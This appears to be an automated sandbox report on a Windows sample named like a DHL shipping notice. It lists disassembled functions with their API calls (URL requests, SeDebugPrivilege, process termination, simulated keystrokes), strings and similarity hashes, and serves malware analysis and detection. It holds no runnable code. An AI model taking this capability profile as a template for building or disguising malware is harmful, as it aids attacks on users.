Function 00AF3886 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00AF3925
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00AF393A
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00AF3954
_wcslen.LIBCMT ref: 00AF3999
SendMessageW.USER32(?,00001057,00000000,?), ref: 00AF39C6
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00AF39F4

Strings

@U=u, xrefs: 00AF3925, 00AF393A
SysListView32, xrefs: 00AF38F7

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: @U=u$SysListView32
API String ID: 2147712094-1908207174
Opcode ID: cf892c13c97bc8be7590d10a4be78582ddc81a2b396bbe9fcc11f3eece7ee5d2
Instruction ID: e5f9c28ea403d5e6a6a38a5bc5e5a803eec7a98fd798d402a7395e609a393fb7
Opcode Fuzzy Hash: cf892c13c97bc8be7590d10a4be78582ddc81a2b396bbe9fcc11f3eece7ee5d2
Instruction Fuzzy Hash: 1F419572A0021DABDF21DFA4CC45BFE77A9EF08350F100566FA58E7291D7B59980CB90

Function 00AF2DFD Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00AF2E1C
GetWindowLongW.USER32(00000000,000000F0), ref: 00AF2E4F
GetWindowLongW.USER32(00000000,000000F0), ref: 00AF2E84
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00AF2EB6
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00AF2EE0
GetWindowLongW.USER32(00000000,000000F0), ref: 00AF2EF1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00AF2F0B

Strings

@U=u, xrefs: 00AF2E1C, 00AF2EB6, 00AF2EE0

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID: @U=u
API String ID: 2178440468-2594219639
Opcode ID: 1613df7f7c2c77853cb3188b87ae68f281e2448aee29f12280607eddf1d3f9f2
Instruction ID: 32c130e23678d5a2757145192d35b80f04a10b49cac9f30ff86611aa45cc6543
Opcode Fuzzy Hash: 1613df7f7c2c77853cb3188b87ae68f281e2448aee29f12280607eddf1d3f9f2
Instruction Fuzzy Hash: D031F230644258AFEB21CF99DD84F693BE5EB9A720F250164FA00CF2B1CB71A842DB41

Function 00ADC253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00ADC272
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00ADC29A
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00ADC2CA
GetLastError.KERNEL32 ref: 00ADC322
SetEvent.KERNEL32(?), ref: 00ADC336
InternetCloseHandle.WININET(00000000), ref: 00ADC341

Strings

, xrefs: 00ADC2BB

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: efc10af5b52432befb3c919ce98f8d0fc416da8997f060dd628a2eb280265255
Instruction ID: 33edf4f73a3ed01a7737522e887434acec9099ce947d5de1f0253c3813b75e73
Opcode Fuzzy Hash: efc10af5b52432befb3c919ce98f8d0fc416da8997f060dd628a2eb280265255
Instruction Fuzzy Hash: 35316DB1500209AFD721EFA58988ABBBBFCEB49764B50851EF44797300DB34DD05DB60

Function 00AC989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00AA3AAF,?,?,Bad directive syntax error,00AFCC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 00AC98BC
LoadStringW.USER32(00000000,?,00AA3AAF,?), ref: 00AC98C3

Part of subcall function 00A69CB3: _wcslen.LIBCMT ref: 00A69CBD

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00AC9987

Strings

Line %d:, xrefs: 00AC9912
Error: , xrefs: 00AC9955
., xrefs: 00AC996D
%s (%d) : ==> %s.: %s %s, xrefs: 00AC98F1
Line %d (File "%s"):, xrefs: 00AC992D

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: 6d897c7b545b4af298e2eae54715d85c93f0be950bc6faf8172436f43284b482
Instruction ID: 05ef66f524332e057bb5610e8012cbfae81ea861083d7a9ee48fbc72257a7a69
Opcode Fuzzy Hash: 6d897c7b545b4af298e2eae54715d85c93f0be950bc6faf8172436f43284b482
Instruction Fuzzy Hash: DF21483280021EBBCF15EF90CE0AEEE7779BF18700F044469F519661A2EB71AA18DB51

Function 00A98D45 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f546d52bc3da439050a4a16f369fa7dad23fb82e00e9ddb4ec6cf972a7129b26
Instruction ID: 93999cdf417a280b20ea1728a18cac12e5e9498f78d28fe1625adbcc9238ed60
Opcode Fuzzy Hash: f546d52bc3da439050a4a16f369fa7dad23fb82e00e9ddb4ec6cf972a7129b26
Instruction Fuzzy Hash: 80C1CF74F04249AFDF11EFACC941BAEBBF0BF1A310F144199E425A7292DB349941CB61

Function 00A9CE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 00A9CEB7
_free.LIBCMT ref: 00A9CF22
_free.LIBCMT ref: 00A9CF48
_free.LIBCMT ref: 00A9CF71
_free.LIBCMT ref: 00A9CFA9
_free.LIBCMT ref: 00A9CFDA
_free.LIBCMT ref: 00A9D01B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 00A9D09C
_free.LIBCMT ref: 00A9D0B5

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: 8f2ccba669d2326cb6c46a05dff52dc7ca187c163f377bce4ac79a8dfd41ffd7
Instruction ID: d3e7ce50ddb9d82db3f42da2d7ca2da66df810c12aba70ae9f4e25b955734c76
Opcode Fuzzy Hash: 8f2ccba669d2326cb6c46a05dff52dc7ca187c163f377bce4ac79a8dfd41ffd7
Instruction Fuzzy Hash: DD613471B08701AFDF21AFB89991B6E7BE5EF05360F14416DF945A7282EB31AD018790

Function 00ADC143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00ADC182
GetLastError.KERNEL32 ref: 00ADC195
SetEvent.KERNEL32(?), ref: 00ADC1A9

Part of subcall function 00ADC253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00ADC272
Part of subcall function 00ADC253: GetLastError.KERNEL32 ref: 00ADC322
Part of subcall function 00ADC253: SetEvent.KERNEL32(?), ref: 00ADC336
Part of subcall function 00ADC253: InternetCloseHandle.WININET(00000000), ref: 00ADC341

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: 65356b7cd43ca9c1acbe9e8b108d7021becd4f7e5aa85ac17ebd954bba76a9a3
Instruction ID: c0ea84ca6ba427da65d92fa1a1249a2d5aa6276d30a419a56283c3c767f33ebb
Opcode Fuzzy Hash: 65356b7cd43ca9c1acbe9e8b108d7021becd4f7e5aa85ac17ebd954bba76a9a3
Instruction Fuzzy Hash: 47318971200706AFDB21AFE69E44AB6BBF8FF18320B50451EF95782710D730E815DBA0

Function 00AC25A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AC3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00AC3A57
Part of subcall function 00AC3A3D: GetCurrentThreadId.KERNEL32 ref: 00AC3A5E
Part of subcall function 00AC3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00AC25B3), ref: 00AC3A65

MapVirtualKeyW.USER32(00000025,00000000), ref: 00AC25BD
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00AC25DB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00AC25DF
MapVirtualKeyW.USER32(00000025,00000000), ref: 00AC25E9
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00AC2601
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00AC2605
MapVirtualKeyW.USER32(00000025,00000000), ref: 00AC260F
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00AC2623
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00AC2627

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 2d1158755f78487a7a7cbcb00add81681df5b4202a5cd4231aa3fb316e09bf92
Instruction ID: e3ef3b652270ce7f33b1209545d3772a310f9b64ad3244ce36b17e496e8b9b5c
Opcode Fuzzy Hash: 2d1158755f78487a7a7cbcb00add81681df5b4202a5cd4231aa3fb316e09bf92
Instruction Fuzzy Hash: 5401D431394228BBFB10A7A99C8AF693F59DF4EB62F110015F318AE0D1C9F26455CA69

Function 00AC1803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00AC1449,?,?,00000000), ref: 00AC180C
HeapAlloc.KERNEL32(00000000,?,00AC1449,?,?,00000000), ref: 00AC1813
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00AC1449,?,?,00000000), ref: 00AC1828
GetCurrentProcess.KERNEL32(?,00000000,?,00AC1449,?,?,00000000), ref: 00AC1830
DuplicateHandle.KERNEL32(00000000,?,00AC1449,?,?,00000000), ref: 00AC1833
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00AC1449,?,?,00000000), ref: 00AC1843
GetCurrentProcess.KERNEL32(00AC1449,00000000,?,00AC1449,?,?,00000000), ref: 00AC184B
DuplicateHandle.KERNEL32(00000000,?,00AC1449,?,?,00000000), ref: 00AC184E
CreateThread.KERNEL32(00000000,00000000,00AC1874,00000000,00000000,00000000), ref: 00AC1868

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 4286858005cbf25e4ed39550c39ddfa996af6d05185e5a758dc64c93f1eb2413
Instruction ID: cf0a30254df6a9f5c45a111cc1a3bd18b0a7abea9ef549c5eb5d9895ed993ca3
Opcode Fuzzy Hash: 4286858005cbf25e4ed39550c39ddfa996af6d05185e5a758dc64c93f1eb2413
Instruction Fuzzy Hash: 3401BBB5240308BFE710EBE6DD4DF6B7BACEB89B51F014511FA05DB1A2CA709811DB64

Function 00AEA0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 00ACD4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 00ACD501
Part of subcall function 00ACD4DC: Process32FirstW.KERNEL32(00000000,?), ref: 00ACD50F
Part of subcall function 00ACD4DC: CloseHandle.KERNEL32(00000000), ref: 00ACD5DC

OpenProcess.KERNEL32(00000001,00000000,?), ref: 00AEA16D
GetLastError.KERNEL32 ref: 00AEA180
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00AEA1B3
TerminateProcess.KERNEL32(00000000,00000000), ref: 00AEA268
GetLastError.KERNEL32(00000000), ref: 00AEA273
CloseHandle.KERNEL32(00000000), ref: 00AEA2C4

Strings

SeDebugPrivilege, xrefs: 00AEA18F

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 7b6e38b2fa0bb938449dd6c30ce447a58f03cb0a29da5d559e2bb944661884be
Instruction ID: 6d1301d6af1ebb181e4b2a84a51e9c4737fa5a557bf13a86e25a21af21e0ba6f
Opcode Fuzzy Hash: 7b6e38b2fa0bb938449dd6c30ce447a58f03cb0a29da5d559e2bb944661884be
Instruction Fuzzy Hash: DE619C302042829FD710DF56C594F65BBE1AF54318F15848CE5668B7A3C772FC45CB92

Function 00AF81DB Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00ABF3AB,00000000,?,?,00000000,?,00AB682C,00000004,00000000,00000000), ref: 00AF824C
EnableWindow.USER32(00000000,00000000), ref: 00AF8272
ShowWindow.USER32(FFFFFFFF,00000000), ref: 00AF82D1
ShowWindow.USER32(00000000,00000004), ref: 00AF82E5
EnableWindow.USER32(00000000,00000001), ref: 00AF830B
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00AF832F

Strings

@U=u, xrefs: 00AF832F

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID: @U=u
API String ID: 642888154-2594219639
Opcode ID: a9964d6499e44b17dba2181a7bd086db79e7d20269b192973a441be92e34d923
Instruction ID: e1e2c96f29be75933a97e8b404a05dc968ef78a63a54ee4b878f34c2338b6b34
Opcode Fuzzy Hash: a9964d6499e44b17dba2181a7bd086db79e7d20269b192973a441be92e34d923
Instruction Fuzzy Hash: 6B419434601648EFDB21CF95C999BF87BE0BB4A714F184269F6184F272CB35A846CF50

Function 00AC4C7D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00AC4C95
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00AC4CB2
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00AC4CEA
_wcslen.LIBCMT ref: 00AC4D08
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00AC4D10
_wcsstr.LIBVCRUNTIME ref: 00AC4D1A

Strings

@U=u, xrefs: 00AC4CB2, 00AC4CEA

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID: @U=u
API String ID: 72514467-2594219639
Opcode ID: 47f95fa1928cc3abe82914b77a10b0076286b956308b5ea41218d38d49c2a59b
Instruction ID: 75e357521a3f7d3229281164275530619e7612d02a72855cafdfb895f6801d04
Opcode Fuzzy Hash: 47f95fa1928cc3abe82914b77a10b0076286b956308b5ea41218d38d49c2a59b
Instruction Fuzzy Hash: 34212C312082047BEB16AB799D15F7B7BACDF49760F11802DF809CA191EA65CD01C360

Function 00ACC874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00ACC913

Strings

question, xrefs: 00ACC8CC
info, xrefs: 00ACC8B4
stop, xrefs: 00ACC8E4
blank, xrefs: 00ACC895
warning, xrefs: 00ACC8FC

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: edf90dd44fb1e64a5dfebeb57aa51ae8d67e3ea8007ad5657e5eafc44f80df70
Instruction ID: a6312391e6610c088e930b4fd850f997904737d787d1bed43c6a271eb9b01bc6
Opcode Fuzzy Hash: edf90dd44fb1e64a5dfebeb57aa51ae8d67e3ea8007ad5657e5eafc44f80df70
Instruction Fuzzy Hash: 8F112032689317BAE705AB54ED83EAF77ECDF15374B11006EF908A62D2E7709D005365

Function 00AB7439 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 37windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 00AB7452
SendMessageW.USER32(?,00001328,00000000,?), ref: 00AB7469
GetWindowDC.USER32(?), ref: 00AB7475
GetPixel.GDI32(00000000,?,?), ref: 00AB7484
ReleaseDC.USER32(?,00000000), ref: 00AB7496
GetSysColor.USER32(00000005), ref: 00AB74B0

Strings

@U=u, xrefs: 00AB7469

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID: @U=u
API String ID: 272304278-2594219639
Opcode ID: 5b3fba60a7f946f2ad9f48be4e448a0fffc0868da595405f55b3c9467a69a794
Instruction ID: ffbe8daf3e33f0acfe9647ff66394b25d35e0fcdb4bd61fee24bd262ba1931e1
Opcode Fuzzy Hash: 5b3fba60a7f946f2ad9f48be4e448a0fffc0868da595405f55b3c9467a69a794
Instruction Fuzzy Hash: 0D018631404209EFEB619FE5DE08BFE7BB9FB04322F204160F916A21A1CB311E52EB10

Function 00ACED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00ACED2A
_wcslen.LIBCMT ref: 00ACED3B
_wcslen.LIBCMT ref: 00ACED79
_wcslen.LIBCMT ref: 00ACEDAF
_wcslen.LIBCMT ref: 00ACEDDF
_wcslen.LIBCMT ref: 00ACEDEF
_wcslen.LIBCMT ref: 00ACEE2B
_wcslen.LIBCMT ref: 00ACEE5A

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: 18308e1af98ab8c71cd1553544c5e5d649fe33136cf0e99e54ef9473b54000d8
Instruction ID: 2db960d7e88ce01bc39631e51b44cccae1fb17cf0276320cade837cba96c28f1
Opcode Fuzzy Hash: 18308e1af98ab8c71cd1553544c5e5d649fe33136cf0e99e54ef9473b54000d8
Instruction Fuzzy Hash: 4B419075C1021876DB21FBF4898AECFB7ACAF45710F508466E528E3162FB34E255C3A6

Function 00A7F8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00AB682C,00000004,00000000,00000000), ref: 00A7F953
ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00AB682C,00000004,00000000,00000000), ref: 00ABF3D1
ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00AB682C,00000004,00000000,00000000), ref: 00ABF454

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

